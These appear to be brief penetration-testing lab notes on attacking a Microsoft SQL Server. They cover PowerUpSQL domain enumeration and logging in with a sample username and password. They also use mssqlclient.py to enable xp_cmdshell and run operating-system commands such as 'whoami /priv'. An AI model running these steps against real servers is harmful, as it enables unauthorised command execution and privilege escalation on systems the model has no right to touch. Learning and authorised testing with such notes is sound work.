
mssql-server

Tool - PowerUpSQL

Cheat sheet: https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet

Run enumeration

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

Authenticate with MSSQL

Windows

Get-SQLQuery -Verbose -Instance "<SQL_server_ip>,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

Linux

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@<sql_server-ip> -windows-auth
help
enable_xp_cmdshell
xp_cmdshell whoami /priv
